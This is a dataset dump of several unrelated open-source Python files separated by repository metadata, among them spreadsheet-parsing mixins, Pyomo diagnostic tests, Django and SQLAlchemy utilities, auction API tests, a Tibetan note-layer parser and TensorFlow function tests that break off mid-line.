get_cleaned_data(self): cleaned_data = OrderedDict() for sheet, items in self.items(): sheet_data = [] for item in items: if item.cleaned_data: sheet_data.append(item.cleaned_data) cleaned_data[sheet.name] = sheet_data return cleaned_data class StatsMixin: def __init__(self, *args, **kwargs): super(StatsMixin, self).__init__(*args, **kwargs) self.stats = {} def parse(self) -> None: self.stats.clear() super().parse() self.compute_stats() def compute_stats(self) -> None: items = list(chain.from_iterable(self.sheet_items.values())) success_count = len([item for item in items if item.is_valid()]) errors_count = len(items) - success_count erroneous_sheets = [sheet.name for sheet, items in self if any(not item.is_valid() for item in items)] self.stats = dict( total_count=len(items), success_count=success_count, errors_count=errors_count, erroneous_sheets=erroneous_sheets ) class ErrorsMixin: def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.lost_headers = set() self.errors = {} def parse(self) -> None: self.lost_headers.clear() self.errors.clear() super().parse() self.collect_errors() def lost_header_handler(self, header: Set[str], row_values: Set[str]) -> None: if header & row_values: self.lost_headers.update(header - row_values) def collect_errors(self) -> None: items = list(chain.from_iterable(self.values())) erroneous_items = [item for item in items if not item.is_valid()] self.errors = dict( non_field_errors=dict( lost_headers=self.lost_headers ) ) for item in erroneous_items: for name, field in item.fields.items(): if name in item.errors: if name not in self.errors: self.errors[name] = dict( label=field.header, rows=[] ) self.errors[name]['rows'].append( dict( nrow=item.nrow, value=field.extract_data(item.data), error=str(item.errors[name]) ) ) class Engine(ErrorsMixin, StatsMixin, BaseEngine): pass
31.491713
110
0.583509
68b5f96342b7d0fa1f982c3962326401240505ee
7,477
py
Python
idaes/core/util/tests/test_model_diagnostics.py
CATER-UCF/idaes-pse
afccbd43e56dc39d63542b4d400ac027b0ccbe84
[ "RSA-MD" ]
null
null
null
idaes/core/util/tests/test_model_diagnostics.py
CATER-UCF/idaes-pse
afccbd43e56dc39d63542b4d400ac027b0ccbe84
[ "RSA-MD" ]
null
null
null
idaes/core/util/tests/test_model_diagnostics.py
CATER-UCF/idaes-pse
afccbd43e56dc39d63542b4d400ac027b0ccbe84
[ "RSA-MD" ]
1
2022-03-17T11:08:43.000Z
2022-03-17T11:08:43.000Z
################################################################################# # The Institute for the Design of Advanced Energy Systems Integrated Platform # Framework (IDAES IP) was produced under the DOE Institute for the # Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021 # by the software owners: The Regents of the University of California, through # Lawrence Berkeley National Laboratory, National Technology & Engineering # Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University # Research Corporation, et al. All rights reserved. # # Please see the files COPYRIGHT.md and LICENSE.md for full copyright and # license information. ################################################################################# """ This module contains model diagnostic utility functions for use in IDAES (Pyomo) models. """ import pytest # Need to update import pyomo.environ as pyo # TODO: Add pyomo.dae test case """ from pyomo.environ import TransformationFactory from pyomo.dae import ContinuousSet, DerivativeVar """ # Need to update from idaes.core.util.model_diagnostics import * # Author: Alex Dowling # This was from # @pytest.fixture() def problem1(): m = pyo.ConcreteModel() m.I = pyo.Set(initialize=[i for i in range(5)]) m.x = pyo.Var(m.I, bounds=(-10, 10), initialize=1.0) m.con1 = pyo.Constraint(expr=m.x[0] + m.x[1] - m.x[3] >= 10) m.con2 = pyo.Constraint(expr=m.x[0] * m.x[3] + m.x[1] >= 0) m.con3 = pyo.Constraint(expr=m.x[4] * m.x[3] + m.x[0] * m.x[3] - m.x[4] == 0) m.obj = pyo.Objective(expr=sum(m.x[i] ** 2 for i in m.I)) return m def example2(with_degenerate_constraint=True): """Create the Pyomo model for Example 2 Arguments: with_degenerate_constraint: Boolean, if True, include the redundant linear constraint Returns: m2: Pyomo model """ m2 = pyo.ConcreteModel() m2.I = pyo.Set(initialize=[i for i in range(1, 4)]) m2.x = pyo.Var(m2.I, bounds=(0, 5), initialize=1.0) m2.con1 = pyo.Constraint(expr=m2.x[1] + m2.x[2] >= 1) m2.con2 = pyo.Constraint(expr=m2.x[1] + m2.x[2] + m2.x[3] == 1) m2.con3 = pyo.Constraint(expr=m2.x[2] - 2 * m2.x[3] <= 1) m2.con4 = pyo.Constraint(expr=m2.x[1] + m2.x[3] >= 1) if with_degenerate_constraint: m2.con5 = pyo.Constraint(expr=m2.x[1] + m2.x[2] + m2.x[3] == 1) m2.obj = pyo.Objective(expr=sum(m2.x[i] for i in m2.I)) return m2 def extract_constraint_names(cs): """Get constraint names from ComponentSet Arguments: cs: ComponentSet object Return: constraint_names: list of constraint names (strings) """ constraint_names = [] for i in cs: constraint_names.append(i.name) return constraint_names # Problem 1 @pytest.mark.skipif(not pyo.SolverFactory("ipopt").available(False), reason="no Ipopt") @pytest.mark.unit def test_problem1(): # Create test problem m = problem1() # Specify Ipopt as the solver opt = pyo.SolverFactory("ipopt") # Specifying an iteration limit of 0 allows us to inspect the initial point opt.options["max_iter"] = 0 # "Solving" the model with an iteration limit of 0 load the initial point and applies # any preprocessors (e.g., enforces bounds) opt.solve(m, tee=True) # Create Degeneracy Hunter object dh = DegeneracyHunter(m) # Find constraints with residuals > 0.1 initial_point_constraints = dh.check_residuals(tol=0.1) # Check there are 2 constraints with large residuals assert len(initial_point_constraints) == 2 initial_point_constraint_names = extract_constraint_names(initial_point_constraints) # Check first constraint assert initial_point_constraint_names[0] == "con1" # Check second constraint assert initial_point_constraint_names[1] == "con3" opt.options["max_iter"] = 50 # Solve opt.solve(m, tee=True) # Find constraints with residuals > 0.1 solution_constraints = dh.check_residuals(tol=1e-6) # Check at the solution no constraints are violated assert len(solution_constraints) == 0 # Check no constraints are near their bounds solution_bounds = dh.check_variable_bounds(tol=0.1) # Check at the solution no constraints are violated assert len(solution_bounds) == 0 # Problem 2 without degenerate constraint @pytest.mark.skipif(not pyo.SolverFactory("ipopt").available(False), reason="no Ipopt") @pytest.mark.unit def test_problem2_without_degenerate_constraint(): # Create test problem instance m2 = example2(with_degenerate_constraint=False) # Specify Ipopt as the solver opt = pyo.SolverFactory("ipopt") # Specifying an iteration limit of 0 allows us to inspect the initial point opt.options["max_iter"] = 0 # "Solving" the model with an iteration limit of 0 load the initial point and applies # any preprocessors (e.g., enforces bounds) opt.solve(m2, tee=True) # Create Degeneracy Hunter object dh2 = DegeneracyHunter(m2) # Check for violated constraints at the initial point initial_point_constraints = dh2.check_residuals(tol=0.1) # Check there are 1 constraints with large residuals assert len(initial_point_constraints) == 1 initial_point_constraint_names = extract_constraint_names(initial_point_constraints) # Check first constraint assert initial_point_constraint_names[0] == "con2" # Resolve opt.options["max_iter"] = 500 opt.solve(m2, tee=True) # Check solution x_sln = [] for i in m2.I: x_sln.append(m2.x[i]()) assert pytest.approx(x_sln[0], abs=1e-6) == 1.0 assert pytest.approx(x_sln[1], abs=1e-6) == 0.0 assert pytest.approx(x_sln[2], abs=1e-6) == 0.0 # Problem 2 with degenerate constraint @pytest.mark.skipif(not pyo.SolverFactory("ipopt").available(False), reason="no Ipopt") @pytest.mark.unit def test_problem2_with_degenerate_constraint(): # Create test problem instance m2 = example2(with_degenerate_constraint=True) # Specify Ipopt as the solver opt = pyo.SolverFactory("ipopt") # Specifying an iteration limit of 0 allows us to inspect the initial point opt.options["max_iter"] = 0 # "Solving" the model with an iteration limit of 0 load the initial point and applies # any preprocessors (e.g., enforces bounds) opt.solve(m2, tee=True) # Create Degeneracy Hunter object dh2 = DegeneracyHunter(m2) # Check for violated constraints at the initial point initial_point_constraints = dh2.check_residuals(tol=0.1) # Check there are 2 constraints with large residuals assert len(initial_point_constraints) == 2 initial_point_constraint_names = extract_constraint_names(initial_point_constraints) # Check first constraint assert initial_point_constraint_names[0] == "con2" # Check first constraint assert initial_point_constraint_names[1] == "con5" # Resolve opt.options["max_iter"] = 500 opt.solve(m2, tee=True) # Check solution x_sln = [] for i in m2.I: x_sln.append(m2.x[i]()) assert pytest.approx(x_sln[0], abs=1e-6) == 1.0 assert pytest.approx(x_sln[1], abs=1e-6) == 0.0 assert pytest.approx(x_sln[2], abs=1e-6) == 0.0 # Check the rank n_rank_deficient = dh2.check_rank_equality_constraints() assert n_rank_deficient == 1 # TODO: Add MILP solver to idaes get-extensions and add more tests
29.788845
93
0.679684
08eab65ea5450a3d895d4fbb35b0897fce239850
1,323
py
Python
apps/dashboard/utilities.py
SteinOveHelset/minutos
73cdcb44409f97b05680c6a048f80eb4bd3f1f46
[ "MIT" ]
23
2020-11-19T19:33:34.000Z
2022-03-02T15:43:08.000Z
apps/dashboard/utilities.py
SteinOveHelset/minutos
73cdcb44409f97b05680c6a048f80eb4bd3f1f46
[ "MIT" ]
1
2021-04-03T18:02:50.000Z
2021-04-03T18:02:50.000Z
apps/dashboard/utilities.py
SteinOveHelset/minutos
73cdcb44409f97b05680c6a048f80eb4bd3f1f46
[ "MIT" ]
2
2021-01-23T02:06:59.000Z
2021-09-09T04:58:09.000Z
# Import Python from datetime import datetime # Models from apps.project.models import Entry # Utility functions def get_time_for_user_and_date(team, user, date): entries = Entry.objects.filter(team=team, created_by=user, created_at__date=date, is_tracked=True) return sum(entry.minutes for entry in entries) def get_time_for_team_and_month(team, month): entries = Entry.objects.filter(team=team, created_at__year=month.year, created_at__month=month.month, is_tracked=True) return sum(entry.minutes for entry in entries) def get_time_for_user_and_month(team, user, month): entries = Entry.objects.filter(team=team, created_by=user, created_at__year=month.year, created_at__month=month.month, is_tracked=True) return sum(entry.minutes for entry in entries) def get_time_for_user_and_project_and_month(team, project, user, month): entries = Entry.objects.filter(team=team, project=project, created_by=user, created_at__year=month.year, created_at__month=month.month, is_tracked=True) return sum(entry.minutes for entry in entries) def get_time_for_user_and_team_month(team, user, month): entries = Entry.objects.filter(team=team, created_by=user, created_at__year=month.year, created_at__month=month.month, is_tracked=True) return sum(entry.minutes for entry in entries)
38.911765
156
0.792139
28ac3ec6248e281db810942a1c6e3e508f25da22
6,040
py
Python
sqlalchemy_filters/models.py
ConnectHolland/sqlalchemy-filters
fbc3269094dae9fc48fa3f080b4881477709e8da
[ "Apache-2.0" ]
null
null
null
sqlalchemy_filters/models.py
ConnectHolland/sqlalchemy-filters
fbc3269094dae9fc48fa3f080b4881477709e8da
[ "Apache-2.0" ]
null
null
null
sqlalchemy_filters/models.py
ConnectHolland/sqlalchemy-filters
fbc3269094dae9fc48fa3f080b4881477709e8da
[ "Apache-2.0" ]
null
null
null
from sqlalchemy.exc import InvalidRequestError from sqlalchemy.inspection import inspect from sqlalchemy.orm.mapper import Mapper from sqlalchemy.util import symbol import types from .exceptions import BadQuery, FieldNotFound, BadSpec class Field(object): def __init__(self, model, field_name): self.model = model self.field_name = field_name def get_sqlalchemy_field(self): sqlalchemy_field = get_nested_column(self.model, self.field_name) if sqlalchemy_field is None: raise FieldNotFound( 'Model {} has no column `{}`.'.format( self.model, self.field_name ) ) # If it's a hybrid method, then we call it so that we can work with # the result of the execution and not with the method object itself if isinstance(sqlalchemy_field, types.MethodType): sqlalchemy_field = sqlalchemy_field() return sqlalchemy_field def _is_hybrid_property(orm_descriptor): return orm_descriptor.extension_type == symbol('HYBRID_PROPERTY') def _is_hybrid_method(orm_descriptor): return orm_descriptor.extension_type == symbol('HYBRID_METHOD') def get_relationship_models(model, field): parts = field.split(".") if len(parts) > 1: # Order in which joins are applied to the query matters so use list. relationships = list() # Find all relationships. for i in range(1, len(parts)): if (column := find_nested_relationship_model(inspect(model), parts[0:i])) is not None: relationships.append(column.class_attribute) return relationships return list() def find_nested_relationship_model(mapper, field): parts = field if isinstance(field, list) else field.split(".") if (part := parts[0]) in mapper.relationships: related_field = mapper.relationships[part] return find_nested_relationship_model(related_field.mapper, ".".join(parts[1::])) if len(parts) > 1 else related_field else: return None def get_nested_column(model, field): """ Searches through relationships to find the requested field. """ parts = field if isinstance(field, list) else field.split(".") mapper = inspect(model) orm_descriptors = mapper.all_orm_descriptors hybrid_fields = [ key for key, item in orm_descriptors.items() if _is_hybrid_property(item) or _is_hybrid_method(item) ] # Search in own model fields if len(parts) == 1: if field in mapper.columns or field in mapper.composites or field in hybrid_fields: return getattr(model, field) else: return None # Search in relationships. if (part := parts[0]) in mapper.relationships: return get_nested_column(getattr(model, part).property.entity.class_, ".".join(parts[1::])) else: return None def get_query_models(query): """Get models from query. :param query: A :class:`sqlalchemy.orm.Query` instance. :returns: A dictionary with all the models included in the query. """ models = [col_desc['entity'] for col_desc in query.column_descriptions] models.extend(mapper.class_ for mapper in query._join_entities) # account also query.select_from entities if ( hasattr(query, '_select_from_entity') and (query._select_from_entity is not None) ): model_class = ( query._select_from_entity.class_ if isinstance(query._select_from_entity, Mapper) # sqlalchemy>=1.1 else query._select_from_entity # sqlalchemy==1.0 ) if model_class not in models: models.append(model_class) return {model.__name__: model for model in models} def get_model_from_spec(spec, query, default_model=None): """ Determine the model to which a spec applies on a given query. A spec that does not specify a model may be applied to a query that contains a single model. Otherwise the spec must specify the model to which it applies, and that model must be present in the query. :param query: A :class:`sqlalchemy.orm.Query` instance. :param spec: A dictionary that may or may not contain a model name to resolve against the query. :returns: A model instance. :raise BadSpec: If the spec is ambiguous or refers to a model not in the query. :raise BadQuery: If the query contains no models. """ models = get_query_models(query) if not models: raise BadQuery('The query does not contain any models.') model_name = spec.get('model') if model_name is not None: models = [v for (k, v) in models.items() if k == model_name] if not models: raise BadSpec( 'The query does not contain model `{}`.'.format(model_name) ) model = models[0] else: if len(models) == 1: model = list(models.values())[0] elif default_model is not None: return default_model else: raise BadSpec("Ambiguous spec. Please specify a model.") return model def get_default_model(query): """ Return the singular model from `query`, or `None` if `query` contains multiple models. """ query_models = get_query_models(query).values() if len(query_models) == 1: default_model, = iter(query_models) else: default_model = None return default_model def auto_join(query, *relationships, is_left_outer_join=False): """ Automatically join models to `query` if they're not already present. """ for relationship in relationships: model = relationship.property.entity.class_ if model not in get_query_models(query).values(): try: query = query.join(relationship, isouter=is_left_outer_join) except InvalidRequestError: pass # can't be autojoined return query
31.134021
126
0.654801
e4f53bc6043aab5ef105ada19f5047b056755ade
1,805
py
Python
python/helpers/pydev/pydev_tests_python/test_pydevd_io.py
alexey-anufriev/intellij-community
ffcd46f14e630acdefcc76e2bfc7c43d2449013a
[ "Apache-2.0" ]
2
2019-04-28T07:48:50.000Z
2020-12-11T14:18:08.000Z
python/helpers/pydev/pydev_tests_python/test_pydevd_io.py
alexey-anufriev/intellij-community
ffcd46f14e630acdefcc76e2bfc7c43d2449013a
[ "Apache-2.0" ]
1
2020-07-30T19:04:47.000Z
2020-07-30T19:04:47.000Z
python/helpers/pydev/pydev_tests_python/test_pydevd_io.py
bradleesand/intellij-community
750ff9c10333c9c1278c00dbe8d88c877b1b9749
[ "Apache-2.0" ]
1
2020-10-15T05:56:42.000Z
2020-10-15T05:56:42.000Z
from _pydevd_bundle.pydevd_io import IORedirector from _pydevd_bundle.pydevd_comm import NetCommandFactory import pytest def test_io_redirector(): class MyRedirection1(object): encoding = 'foo' class MyRedirection2(object): pass my_redirector = IORedirector(MyRedirection1(), MyRedirection2(), wrap_buffer=True) none_redirector = IORedirector(None, None, wrap_buffer=True) assert my_redirector.encoding == 'foo' with pytest.raises(AttributeError): none_redirector.encoding # Check that we don't fail creating the IORedirector if the original # doesn't have a 'buffer'. for redirector in ( my_redirector, none_redirector, ): redirector.write('test') redirector.flush() assert not redirector.isatty() class _DummyWriter(object): __slots__ = ['commands', 'command_meanings'] def __init__(self): self.commands = [] self.command_meanings = [] def add_command(self, cmd): from _pydevd_bundle.pydevd_comm import ID_TO_MEANING meaning = ID_TO_MEANING[str(cmd.id)] self.command_meanings.append(meaning) self.commands.append(cmd) class _DummyPyDb(object): def __init__(self): self.cmd_factory = NetCommandFactory() self.writer = _DummyWriter() def test_debug_console(): from _pydev_bundle.pydev_console_utils import DebugConsoleStdIn class OriginalStdin(object): def readline(self): return 'read' original_stdin = OriginalStdin() py_db = _DummyPyDb() debug_console_std_in = DebugConsoleStdIn(py_db, original_stdin) assert debug_console_std_in.readline() == 'read' assert py_db.writer.command_meanings == ['CMD_INPUT_REQUESTED', 'CMD_INPUT_REQUESTED']
25.422535
90
0.692521
3f0815ae203c73e2c6ae98751aeac2234ba74563
80
py
Python
src/pyim/cis/callers/__init__.py
jrderuiter/pyim
e767c3bd14e0d0c9b3d0ff3482c19a8e1a9c61d4
[ "MIT" ]
null
null
null
src/pyim/cis/callers/__init__.py
jrderuiter/pyim
e767c3bd14e0d0c9b3d0ff3482c19a8e1a9c61d4
[ "MIT" ]
1
2018-05-11T02:46:09.000Z
2018-05-11T02:46:09.000Z
src/pyim/cis/callers/__init__.py
jrderuiter/pyim
e767c3bd14e0d0c9b3d0ff3482c19a8e1a9c61d4
[ "MIT" ]
1
2018-04-17T16:08:34.000Z
2018-04-17T16:08:34.000Z
from .base import CisCaller, CisCallerCommand from .cimpl import CimplCisCaller
26.666667
45
0.85
2a229e300b0e4e0c451789a6f0b05c492efab0e6
4,954
py
Python
openprocurement/auctions/swiftsure/tests/lot.py
bdmbdsm/openprocurement.auctions.swiftsure
f5b93555eb12212c69c8168f861376eae85f4648
[ "Apache-2.0" ]
null
null
null
openprocurement/auctions/swiftsure/tests/lot.py
bdmbdsm/openprocurement.auctions.swiftsure
f5b93555eb12212c69c8168f861376eae85f4648
[ "Apache-2.0" ]
null
null
null
openprocurement/auctions/swiftsure/tests/lot.py
bdmbdsm/openprocurement.auctions.swiftsure
f5b93555eb12212c69c8168f861376eae85f4648
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- import unittest from openprocurement.auctions.core.tests.base import snitch from openprocurement.auctions.core.tests.lot import AuctionLotResourceTestMixin, AuctionLotProcessTestMixin from openprocurement.auctions.core.tests.blanks.lot_blanks import ( # AuctionLotFeatureResourceTest auction_value, auction_features_invalid, # AuctionLotBidderResourceTest create_auction_bidder_invalid, patch_auction_bidder, # AuctionLotFeatureBidderResourceTest create_auction_bidder_invalid_feature, create_auction_bidder_feature ) from openprocurement.auctions.swiftsure.tests.base import ( BaseWebTest, BaseAuctionWebTest, test_lots, test_auction_data, ) from openprocurement.auctions.swiftsure.tests.blanks.lot_blanks import ( # AuctionLotResourceTest patch_auction_currency ) @unittest.skip("option not available") class AuctionLotResourceTest(BaseAuctionWebTest, AuctionLotResourceTestMixin): test_lots = test_lots test_auction_data = test_auction_data test_patch_auction_currency = snitch(patch_auction_currency) @unittest.skip("option not available") class AuctionLotFeatureResourceTest(BaseAuctionWebTest): initial_lots = 2 * test_lots test_auction_data = test_auction_data test_auction_value = snitch(auction_value) test_auction_features_invalid = snitch(auction_features_invalid) @unittest.skip("option not available") class AuctionLotBidderResourceTest(BaseAuctionWebTest): initial_status = 'active.tendering' initial_lots = test_lots test_create_auction_bidder_invalid = snitch(create_auction_bidder_invalid) test_patch_auction_bidder = snitch(patch_auction_bidder) @unittest.skip("option not available") class AuctionLotFeatureBidderResourceTest(BaseAuctionWebTest): initial_lots = test_lots def setUp(self): super(AuctionLotFeatureBidderResourceTest, self).setUp() self.lot_id = self.initial_lots[0]['id'] response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {"data": { "items": [ { 'relatedLot': self.lot_id, 'id': '1' } ], "features": [ { "code": "code_item", "featureOf": "item", "relatedItem": "1", "title": u"item feature", "enum": [ { "value": 0.01, "title": u"good" }, { "value": 0.02, "title": u"best" } ] }, { "code": "code_lot", "featureOf": "lot", "relatedItem": self.lot_id, "title": u"lot feature", "enum": [ { "value": 0.01, "title": u"good" }, { "value": 0.02, "title": u"best" } ] }, { "code": "code_tenderer", "featureOf": "tenderer", "title": u"tenderer feature", "enum": [ { "value": 0.01, "title": u"good" }, { "value": 0.02, "title": u"best" } ] } ] }}) self.assertEqual(response.status, '200 OK') self.assertEqual(response.content_type, 'application/json') self.assertEqual(response.json['data']['items'][0]['relatedLot'], self.lot_id) self.set_status('active.tendering') test_create_auction_bidder_invalid_feature = snitch(create_auction_bidder_invalid_feature) test_create_auction_bidder_feature = snitch(create_auction_bidder_feature) @unittest.skip("option not available") class AuctionLotProcessTest(BaseAuctionWebTest, AuctionLotProcessTestMixin): setUp = BaseWebTest.setUp test_lots = test_lots test_auction_data = test_auction_data def suite(): tests = unittest.TestSuite() tests.addTest(unittest.makeSuite(AuctionLotResourceTest)) tests.addTest(unittest.makeSuite(AuctionLotFeatureResourceTest)) tests.addTest(unittest.makeSuite(AuctionLotBidderResourceTest)) tests.addTest(unittest.makeSuite(AuctionLotFeatureBidderResourceTest)) tests.addTest(unittest.makeSuite(AuctionLotProcessTest)) return tests if __name__ == '__main__': unittest.main(defaultTest='suite')
33.931507
107
0.571256
e6c584e0befef0b7d8541b91b80019ed095d79bb
157
py
Python
articlevue/routers.py
wesleymutwiri/articlevue
04dbe278bea8e96dbc95bb1c986dbce025c0957a
[ "MIT" ]
null
null
null
articlevue/routers.py
wesleymutwiri/articlevue
04dbe278bea8e96dbc95bb1c986dbce025c0957a
[ "MIT" ]
null
null
null
articlevue/routers.py
wesleymutwiri/articlevue
04dbe278bea8e96dbc95bb1c986dbce025c0957a
[ "MIT" ]
null
null
null
from rest_framework import routers from articles.viewsets import ArticleViewSet router = routers.DefaultRouter() router.register(r'articles',ArticleViewSet)
31.4
44
0.853503
adf06274045e7a2d1567389e357a0a5d22561038
2,117
py
Python
tests/settings.py
yunojuno/django-expiring-links
1f8b98544327ce1e5ca4a9a2a3e0ca6e8dd33f48
[ "MIT" ]
null
null
null
tests/settings.py
yunojuno/django-expiring-links
1f8b98544327ce1e5ca4a9a2a3e0ca6e8dd33f48
[ "MIT" ]
null
null
null
tests/settings.py
yunojuno/django-expiring-links
1f8b98544327ce1e5ca4a9a2a3e0ca6e8dd33f48
[ "MIT" ]
null
null
null
DEBUG = True DATABASES = { "default": { "ENGINE": "django.db.backends.sqlite3", "NAME": "test.db", } } INSTALLED_APPS = ( "django.contrib.admin", "django.contrib.auth", "django.contrib.sessions", "django.contrib.contenttypes", "django.contrib.messages", "django.contrib.staticfiles", "request_token", "tests", ) MIDDLEWARE = [ "django.middleware.common.CommonMiddleware", "django.middleware.csrf.CsrfViewMiddleware", "django.contrib.sessions.middleware.SessionMiddleware", "django.contrib.messages.middleware.MessageMiddleware", "django.contrib.auth.middleware.AuthenticationMiddleware", "request_token.middleware.RequestTokenMiddleware", ] TEMPLATES = [ { "BACKEND": "django.template.backends.django.DjangoTemplates", "DIRS": [ # insert your TEMPLATE_DIRS here ], "APP_DIRS": True, "OPTIONS": { "context_processors": [ "django.template.context_processors.request", "django.contrib.auth.context_processors.auth", "django.contrib.messages.context_processors.messages", "request_token.context_processors.request_token", ] }, } ] ALLOWED_HOSTS = ["localhost", "127.0.0.1"] SECRET_KEY = "request_token" # noqa: S703,S105 ROOT_URLCONF = "tests.urls" APPEND_SLASH = True STATIC_URL = "/static/" STATIC_ROOT = "./static" TIME_ZONE = "UTC" SITE_ID = 1 LOGGING = { "version": 1, "disable_existing_loggers": False, "formatters": { "verbose": { "format": "%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s" }, "simple": {"format": "%(levelname)s %(message)s"}, }, "handlers": { "console": { "level": "DEBUG", "class": "logging.StreamHandler", "formatter": "simple", } }, "loggers": {"request_token": {"handlers": ["console"], "level": "DEBUG"}}, } if not DEBUG: raise Exception("This project is only intended to be used for testing.")
24.905882
95
0.600378
cc309b1675eb85de43c0e67d3340f6af89529131
4,720
py
Python
pedurma/preview_note_layer.py
Esukhia/pedurma
334b5957db30f514d396bd9defc9e9381f5b290b
[ "MIT" ]
null
null
null
pedurma/preview_note_layer.py
Esukhia/pedurma
334b5957db30f514d396bd9defc9e9381f5b290b
[ "MIT" ]
null
null
null
pedurma/preview_note_layer.py
Esukhia/pedurma
334b5957db30f514d396bd9defc9e9381f5b290b
[ "MIT" ]
1
2021-11-04T07:04:05.000Z
2021-11-04T07:04:05.000Z
import re from pathlib import Path from uuid import uuid4 from pedurma.utils import to_yaml def get_note_layer(note_annotation): note_layer = { "id": uuid4().hex, "annotation_type": "PedurmaNote", "revision": "00001", "annotations": note_annotation, } return note_layer def get_pages(vol_text): result = [] pg_text = "" pages = re.split(r"([0-9]+\-[0-9]+)", vol_text) for i, page in enumerate(pages[0:]): if i % 2 == 0: pg_text += page else: pg_text += page result.append(pg_text) pg_text = "" return result def get_last_syl_and_note_match(note_pattern, note): if re.search(r"ལྟར་བཀོད།", note): last_syl = "" elif re.search(r"#", note_pattern): syls = re.split(r"#", note_pattern) last_syl = syls[1] else: last_syl = note_pattern note_match = last_syl + note return last_syl, note_match def parse_note(note, walker, page_content, plus_present): note_ann = {} note_pattern = re.search(rf"(:\S+)?{note}", page_content) if plus_present: plus_note = re.sub(r"\+", r"\+", note) if re.search(rf"\S+་([^#]\S+་?){plus_note}", page_content): note_pattern = re.search(rf"\S+་([^#]\S+་?){plus_note}", page_content) last_syl, note_match = get_last_syl_and_note_match( note_pattern.group(1), plus_note ) grp_1_loc = page_content.find(last_syl + note) else: note_pattern = re.search(rf"([^#]\S+་?){plus_note}", page_content) if note_pattern: grp_1_loc = note_pattern.start() last_syl = "" ann_start = grp_1_loc + walker + len(last_syl) ann_end = ann_start else: if note_pattern.group(1): ann_start = note_pattern.start() + walker ann_end = ann_start + len(note_pattern.group(1)) else: if re.search(rf"\S+་([^#]\S+་?){note}", page_content): note_pattern = re.search(rf"\S+་([^#]\S+་?){note}", page_content) last_syl, note_match = get_last_syl_and_note_match( note_pattern.group(1), note ) grp_1_loc = page_content.find(note_match) else: note_pattern = re.search(rf"([^#]\S+་?){note}", page_content) if note_pattern: grp_1_loc = note_pattern.start() last_syl = note_pattern.group(1) ann_start = grp_1_loc + walker if note_pattern.group(1): ann_end = ann_start + len(last_syl) else: ann_end = ann_start note_ann = { "span": { "start": ann_start, # the variant unit or variant location is capture with help of this span "end": ann_end, }, "collation_note": note, } page_content = re.sub(note, "", page_content, 1) return note_ann, page_content def parse_page(page, note_annotation, char_walker): cur_note = {} page = page.replace("\n", "#") page_content = re.sub(r"(\([༠-༩]+\)\s)", "", page) notes = re.findall(r"\<.*?\>", page_content) for note in notes: match = re.search(r"(\<.*?)(\+)(.*?\>)", note) if match: if match.group(2): note_info, page_content = parse_note( note, char_walker, page_content, True ) else: note_info, page_content = parse_note(note, char_walker, page_content, False) cur_note[uuid4().hex] = note_info note_annotation.update(cur_note) cur_note = {} new_page = base_extract(page) return note_annotation, new_page def base_extract(text): text = re.sub(r"#", "\n", text) return re.sub(r"(\([༠-༩]+\)\s)?<.*?>", "", text) def build_note_layer(text): char_walker = 0 note_annotation = {} pages = get_pages(text) for page in pages: page = re.sub(r"([0-9]+\-[0-9]+)", "\n", page) note_annotation, new_page = parse_page(page, note_annotation, char_walker) char_walker += len(new_page) - 1 note_layer = get_note_layer(note_annotation) return note_layer def update_hybird_pecha_note_layer(preview_text, hybird_pecha_path, vol_num): hybird_pecha_path = Path(hybird_pecha_path) note_layer = build_note_layer(preview_text) note_yml = to_yaml(note_layer) note_yml_path = ( hybird_pecha_path / f"{hybird_pecha_path.stem}.opf" / "layers" / f"v{vol_num:03}" / "PedurmaNote.yml" ) note_yml_path.write_text(note_yml, encoding="utf-8")
32.777778
105
0.56822
1660be13574adc9918303a3b841f86b8ffecc4d8
26,786
py
Python
tensorflow/python/framework/function_test.py
RMORIOKA/tensorflow
6886eb9c73940fd3b4dfadc3d6964ae9aa71eef6
[ "Apache-2.0" ]
null
null
null
tensorflow/python/framework/function_test.py
RMORIOKA/tensorflow
6886eb9c73940fd3b4dfadc3d6964ae9aa71eef6
[ "Apache-2.0" ]
null
null
null
tensorflow/python/framework/function_test.py
RMORIOKA/tensorflow
6886eb9c73940fd3b4dfadc3d6964ae9aa71eef6
[ "Apache-2.0" ]
null
null
null
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================= """Tests for functions.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import time import numpy as np import tensorflow as tf from tensorflow.python.framework import function from tensorflow.python.ops import functional_ops from tensorflow.python.ops import gen_logging_ops def _OptimizerOptions(): for cse in [False, True]: for inline in [False, True]: for cfold in [False, True]: yield tf.ConfigProto(graph_options=tf.GraphOptions( optimizer_options=tf.OptimizerOptions( opt_level=tf.OptimizerOptions.L0, do_common_subexpression_elimination=cse, do_function_inlining=inline, do_constant_folding=cfold))) class FunctionTest(tf.test.TestCase): def testDefineFunction2Args(self): @function.Defun(tf.float32, tf.float32, func_name="APlus2B") def APlus2B(a, b): return a + b * 2 with tf.Graph().as_default(): call = APlus2B([1.0], [2.0]) self.assertEqual("APlus2B", call.op.name) with tf.Session() as sess: self.assertAllEqual([5.0], sess.run(call)) def testGradientFunc(self): @function.Defun(tf.float32, func_name="XSquarePlusOneFn") def XSquarePlusOne(x): return x * x + 1.0 @function.Defun(tf.float32, tf.float32) def XSquarePlusOneGrad(x, dy): dx = functional_ops._symbolic_gradient( input=[x, dy], Tout=[tf.float32], f="XSquarePlusOneFn", name="dx") return dx g = tf.Graph() with g.as_default(): call_f = XSquarePlusOne([2.0]) call_g = XSquarePlusOneGrad([2.0], [0.1]) with tf.Session() as sess: self.assertAllClose([5.0], sess.run(call_f)) self.assertAllClose([0.4], sess.run(call_g)) def testTanhSymGrad(self): @function.Defun(tf.float32) def Forward(x): return tf.reduce_sum(tf.tanh(x)) g = tf.Graph() with g.as_default(): x = tf.placeholder(tf.float32) y = Forward(x) dx = tf.gradients([y], [x]) inp = np.array([-1, 1, 2, -2], dtype=np.float32) feed = {x: inp} cfg = 